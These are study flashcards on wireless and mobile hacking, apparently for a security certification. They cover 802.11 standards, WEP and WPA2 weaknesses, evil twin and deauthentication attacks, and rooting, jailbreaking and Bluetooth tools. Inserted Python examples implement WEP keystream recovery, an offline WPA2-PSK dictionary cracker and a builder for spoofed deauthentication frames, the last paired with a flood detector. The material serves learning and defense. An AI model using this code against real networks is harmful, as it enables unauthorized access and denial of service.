Chapter 7 - Wireless Network Hacking Flashcards
List the speeds, frequencies and modulation type for the following
- 11a
- 11b
- 11g
- 11n
- 11ac
- 11a - 54 Mbps, 5 GHz, OFDM
- 11b - 11 Mbps, 2.4 GHz, DSSS
- 11g - 54 Mbps, 2.4 GHz, OFDM (falls back to DSSS for 11b clients)
- 11n - 100+ Mbps (up to 600 Mbps with MIMO), 2.4 and 5 GHz, OFDM
- 11ac - 1000+ Mbps (gigabit class), 5 GHz, OFDM with 256-QAM
Exam Tip
- 11i
- 16
- 11i - amendment for security mechanisms on WLANs (the basis of WPA2: RSN, CCMP and the 4-way handshake)
- 802.16 - WiMAX; speeds started at 40 Mbps and are moving to gigabit
Define Orthogonal Frequency Division Multiplexing (OFDM)
several sub-carriers simultaneously carry pieces of the same message.
The channel is divided into a series of closely spaced, orthogonal frequency bands that do not interfere with each other, and each carries a separate signal
Define Direct Sequence Spread Spectrum (DSSS)
DSSS spreads one message over the entire available band at once: each data bit is multiplied by a pseudorandom "chipping" sequence (an 11-chip Barker code in 802.11b), so the whole bandwidth is used for the delivery of a single message
Define Basic Service Area (BSA)
Define Basic Service Set (BSS)
BSA - single access point coverage
BSS - communication between single AP and its clients
Define Extended Service Set (ESS)
when multiple APs are set up on the same SSID with non-overlapping channels, and a client can associate and disassociate from each one as it roams between them.
Define BSSID
the MAC Address of the WAP at the center of your BSS
Define dipole and Parabolic dish antennas
dipole - two radiating elements (signal "towers"); omnidirectional, short range
parabolic dish - like a satellite dish; directional, tremendous range
Define Service Set Identifier (SSID)
text string that identifies the wireless network
Compare Association and Authentication for a WLAN
Association - act of the client connecting to an AP (joining the BSS so it can send data through the AP)
Authentication - the client is identified before it can access anything on the network. In the 802.11 state machine the (open-system) authentication exchange comes first, then association; under WPA/WPA2 the real proof of identity is the 4-way handshake that follows association
Wired Equivalent Privacy (WEP) encryption notes
Intended only to give privacy equivalent to a wired hub
uses RC4 with a 40- or 104-bit shared key and a 24-bit Initialization Vector (IV)
WEP IV issues
A 32-bit integrity check value (ICV), which is just a CRC-32 of the payload, is appended to the data
A 24-bit IV, sent in the clear, is prepended to the shared key to seed RC4
The RC4 keystream is XORed with data || ICV to produce the ciphertext
But the IV is small (2^24 values, so it repeats on a busy network), RC4's key scheduling leaks key bytes for weak IVs (FMS/KoreK/PTW attacks), and the CRC is linear, so WEP is easily cracked. The attacker captures enough frames with distinct IVs (tens of thousands with PTW; ARP replay generates them quickly) and recovers the key
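The WEP frame construction above, as an added example (not code from the original page): a textbook RC4, the IV || key seeding, the CRC-32 ICV, and what an attacker gets when two frames reuse an IV. The key, IV and the two ARP-sized plaintexts are constructed for the demo.

```python
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Textbook RC4: key-scheduling, then enough PRGA output for `length` bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, data: bytes) -> bytes:
    """Frame body as WEP sends it: IV (3 bytes, in the clear) || key-id byte ||
    RC4(iv || key) XOR (data || CRC-32 ICV). The ICV only catches noise:
    CRC-32 is linear and unkeyed, so it is no defence against tampering."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)  # 24-bit IV, 40- or 104-bit key
    icv = zlib.crc32(data).to_bytes(4, "little")
    keystream = rc4(iv + wep_key, len(data) + 4)
    return iv + b"\x00" + xor(data + icv, keystream)


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Returns (data, icv_ok). The receiver reads the IV off the wire and rebuilds the keystream."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4(iv + wep_key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    return data, zlib.crc32(data).to_bytes(4, "little") == icv


def iv_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames with the same IV share a keystream, so XORing their bodies
    cancels it and leaves plaintext_a XOR plaintext_b, with no key needed."""
    assert frame_a[:3] == frame_b[:3], "different IVs, different keystreams"
    return xor(frame_a[4:], frame_b[4:])


def keystream_from_known_plaintext(frame: bytes, known_data: bytes) -> bytes:
    """One known plaintext (an ARP request has a predictable layout) yields the
    whole keystream for that IV, which decrypts every other frame under it."""
    icv = zlib.crc32(known_data).to_bytes(4, "little")
    return xor(frame[4:], known_data + icv)


# Constructed demo values (not real traffic): a 40-bit key and two frames that
# reuse one IV. With only 2^24 IVs a busy network repeats them within hours,
# and ARP replay forces repeats within minutes.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("000001")
P1 = b"ARP who-has 10.0.0.1 tell 10.0.0.9"
P2 = b"ARP who-has 10.0.0.2 tell 10.0.0.9"
F1 = wep_encrypt(KEY, IV, P1)
F2 = wep_encrypt(KEY, IV, P2)


def demo_recover_p2() -> bytes:
    """Attacker knows P1, sees F1 and F2 with the same IV, recovers P2 without KEY."""
    keystream = keystream_from_known_plaintext(F1, P1)
    return xor(F2[4:], keystream)[:-4]


if __name__ == "__main__":
    print(wep_decrypt(KEY, F1))
    print(demo_recover_p2())
```

The key-recovery attacks (FMS/KoreK/PTW) go one step further and derive the key itself from statistics over many IVs; the keystream reuse shown here is the simpler property that already breaks confidentiality.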
WiFi Protected Access (WPA)
Uses TKIP: a 128-bit temporal key, mixed with the client's MAC address and a per-packet sequence counter to produce a fresh RC4 key for every frame
Rotates the temporal key every 10,000 packets (hence Temporal); still RC4 underneath, so it ran as a firmware upgrade on WEP hardware
The master key (PMK) is never sent over the air. It comes from the EAP session (Enterprise) or the pre-shared key (Personal); a 4-way handshake then derives the session keys and proves to each side that the other holds the PMK
TKIP
Temporal Key Integrity Protocol
A stopgap for WEP-era hardware; has known weaknesses (the Michael MIC can be recovered with Beck-Tews style attacks) and is deprecated
WiFi Protected Access 2 (WPA2)
Uses AES (a FIPS 140-2 validated cipher) instead of RC4
WPA2-Enterprise - 802.1X/EAP authentication against a RADIUS server; every user ends up with their own PMK
WPA2-Personal - pre-shared key; the PMK is PBKDF2(passphrase, SSID) and is the same for every client
Uses CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol): AES in counter mode for confidentiality and a CBC-MAC tag (the message integrity code, MIC) for integrity, with a packet number for replay protection
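The WPA/WPA2-Personal key derivation and 4-way handshake described above, as an added example (not code from the original page): passphrase to PMK via PBKDF2, PMK to PTK via the 802.11i PRF-512, the HMAC-SHA1 MIC on handshake message 2, and the offline dictionary attack that a captured handshake makes possible. The SSID, MAC addresses, nonces, passphrase and the EAPOL-Key frame layout values are constructed for the demo; the derivation steps follow the standard.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + EAPOL-Key fields before the MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so precomputed tables are only valid per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i over min/max of the MACs and nonces.
    PTK bytes 0-15: KCK (signs handshake messages), 16-31: KEK (wraps the GTK),
    32-47: TK (the CCMP key used for data frames)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the whole EAPOL frame with
    the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes = None) -> bytes:
    """Handshake message 2 (client -> AP): carries SNonce and the first MIC.
    Layout: EAPOL(ver 2, type 3 = Key, len) | descriptor type 2 (RSN) |
    key info 0x010A (MIC set, pairwise, version 2) | key length 16 |
    replay counter | nonce(32) | IV(16) | RSC(8) | ID(8) | MIC(16) | key data len."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    if kck is not None:
        frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return frame


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: every input to the MIC except the passphrase is
    in the capture, so each guess costs one PBKDF2 run and one HMAC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed handshake (not a real capture): SSID, MACs, nonces and passphrase are made up.
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")            # AP MAC
SPA = bytes.fromhex("deadbeef0001")           # client MAC
ANONCE = hashlib.sha256(b"anonce").digest()   # 32-byte nonces, random in practice
SNONCE = hashlib.sha256(b"snonce").digest()
PASSPHRASE = "correct horse"
KCK = ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
MSG2 = build_msg2(SNONCE, KCK)


def demo(wordlist=("password", "12345678", "correct horse", "letmein1")):
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, MSG2, wordlist)


if __name__ == "__main__":
    print(demo())
```

Two things the code makes concrete: the handshake never transmits the PMK, only nonces and MICs, which is what "proves the client belongs to the AP and vice versa" means; and in Personal mode everyone shares one PMK, so one captured handshake plus a weak passphrase exposes the whole network, while Enterprise mode gives each session its own PMK from EAP.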
Different Attacks
Evil Twin (aka mis-association attack), Ad-Hoc
Evil Twin - set up a rogue WAP that looks like the legitimate one (same SSID, stronger signal), have victims associate to it, hand them your spoofed DNS settings, capture their packets, etc.
ad-hoc - attacker sets up a laptop and advertises an ad-hoc (peer-to-peer) network under a familiar name. Shouldn't work, but often does
“honeyspot” attack
faking a well-known hotspot SSID like Starbucks or AT&T, so devices that remember the name connect automatically
Wireless Denial of Service attacks
disassociate
unauthorized association
jamming the wireless signal
disassociate - craft and send spoofed deauthentication/disassociation management frames to the client (or to broadcast) that force it to drop its connection; these frames are unauthenticated unless 802.11w (protected management frames) is enabled
unauthorized association
Use a rogue AP to get legitimate users to connect, which removes their access to the legitimate AP
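The deauthentication frame behind the disassociation DoS above, as an added example (not code from the original page): the frame is built and parsed with struct so the fields are visible, and a small detector flags a flood the way a wireless IDS would. The MAC addresses, timestamps and the sample capture are constructed; the duration value 0x013A is just a plausible microsecond count and does not matter for the demo.

```python
import struct
from collections import defaultdict, deque

# Frame Control for deauthentication: protocol 0, type 0 (management), subtype 12.
# Sent little-endian, so the first byte on the wire is 0xC0. Disassociation is subtype 10.
FC_DEAUTH = 0x00C0
REASON_CLASS3_FROM_NONASSOC = 7  # the reason code attack tools usually default to


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(bssid: str, client: str, reason: int = REASON_CLASS3_FROM_NONASSOC, seq: int = 0) -> bytes:
    """24-byte management header + 2-byte reason code.
    addr1 = receiver (the victim, or ff:ff:ff:ff:ff:ff for every client),
    addr2 = transmitter (spoofed as the AP), addr3 = BSSID.
    Nothing in the frame authenticates addr2, which is why this works against
    networks without 802.11w management-frame protection."""
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH, 0x013A,
                         mac_bytes(client), mac_bytes(bssid), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_frame(frame: bytes) -> dict:
    """Decode the management header; add the reason code for deauth/disassoc."""
    fc, _dur, a1, a2, a3, seqctl = struct.unpack_from("<HH6s6s6sH", frame, 0)
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "receiver": mac_str(a1), "transmitter": mac_str(a2),
            "bssid": mac_str(a3), "seq": seqctl >> 4}
    if info["type"] == 0 and info["subtype"] in (10, 12):
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_flood(frames, window: float = 1.0, threshold: int = 10) -> set:
    """Detection side. `frames` is an iterable of (timestamp_seconds, raw_frame).
    Flags any transmitter that sends `threshold` or more deauth/disassoc frames
    within any `window`-second span; a client genuinely leaving sends one or two."""
    recent = defaultdict(deque)
    flagged = set()
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        info = parse_frame(raw)
        if info["type"] != 0 or info["subtype"] not in (10, 12):
            continue
        q = recent[info["transmitter"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged.add(info["transmitter"])
    return flagged


# Constructed capture (not real traffic): one legitimate deauth (reason 3, "STA is
# leaving") from AP B, then 25 broadcast deauths in one second spoofing AP A.
AP_A, AP_B = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
CLIENT = "de:ad:be:ef:00:01"
BROADCAST = "ff:ff:ff:ff:ff:ff"
SAMPLE_CAPTURE = [(0.5, build_deauth(AP_B, CLIENT, reason=3, seq=17))]
SAMPLE_CAPTURE += [(1.0 + i * 0.04, build_deauth(AP_A, BROADCAST, seq=i)) for i in range(25)]


def demo() -> set:
    return detect_deauth_flood(SAMPLE_CAPTURE)


if __name__ == "__main__":
    print(parse_frame(SAMPLE_CAPTURE[0][1]))
    print(demo())
```

The detector keys on the transmitter address, which the attacker spoofs to the BSSID, so in practice it flags the legitimate AP's address and the alert reads "someone is impersonating AP A"; correlating with signal strength or sequence-number jumps is how a WIDS tells the spoofed frames from the real AP's.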
Wireless sniffing tools
OmniPeek
AirMagnet
WiFi Analyzer Pro
WiFi Pilot
OmniPeek - also shows network activity status and monitoring
AirMagnet - from Fluke. Also has compliance reporting engine
WiFi Analyzer Pro
WiFi Pilot
Tools for rooting Android
SuperOneClick
Superboot, OneClickRoot, Kingo, Unrevoked, RescueRoot, UnlockRootPro
3 Types of jailbreaking iOS
Userland (user-level access only, no control of the boot chain)
iBoot and Bootrom exploits both grant admin (root) privileges; a Bootrom exploit lives in read-only boot code, so Apple cannot patch it with a software update
3 Techniques for jailbreaking iOS
untethered - kernel remains patched (jailbroken) after reboot with or without a system connection
semi-tethered - reboot doesn’t retain patched kernel, but software is already added to device. So if admin privileges are needed, the installed jailbreaking tool can be used
tethered - reboot removes all jailbreaking patches and phone may get stuck in constant loop on startup, requiring USB (system) connection to fix
jailbreaking tools
evasi0n7
GeekSn0w
Pangu
Redsn0w
Absinthe
Cydia
Mobile Device Management for securing mobile devices
can be used to push out security policies, application deployment and monitoring
XenMobile
MaaS360
AirWatch
MobiControl
Bluetooth Tools
BlueScanner BT Browser Bluesniff, btCrawler Blooover PhoneSnoop BBProxy
BlueScanner - finding devices, tries to extract and display as much as possible
BT Browser - finding, enumerating devices
Bluesniff, btCrawler - similar but with GUIs
Blooover - Bluebugging (taking control of a phone over Bluetooth)
PhoneSnoop, BBProxy - spyware on a BlackBerry
Personal tips
know what CCMP, EAP, MIC do
know what you need to crack WEP
know which tools are good for which techniques
which wireless protocols use which type of encryption
which tools give root on mobile devices
jailbreaking techniques
know what CCMP, EAP, MIC do
(MIC: Message Integrity Code. A keyed integrity tag on every frame: Michael in TKIP, CBC-MAC in CCMP. It is paired with a per-packet sequence number, the TSC in TKIP and the packet number in CCMP, so replayed or reordered frames are dropped.)
know what you need to crack WEP
(the target's BSSID (AP MAC), SSID and channel, a card in monitor mode, and enough captured frames with distinct IVs; ARP replay speeds up collecting them)
know which tools are good for which techniques
which wireless protocols use which type of encryption
which tools give root on mobile devices
jailbreaking techniques
Define Untethered Jailbreaking Technique
untethered - kernel remains patched (jailbroken) after reboot with or without a system connection
Define Semi-Tethered Jailbreaking Technique
semi-tethered - reboot doesn’t retain patched kernel, but software is already added to device. So if admin privileges are needed, the installed jailbreaking tool can be used
Define Tethered Jailbreaking Technique
tethered - reboot removes all jailbreaking patches and phone may get stuck in constant loop on startup, requiring USB (system) connection to fix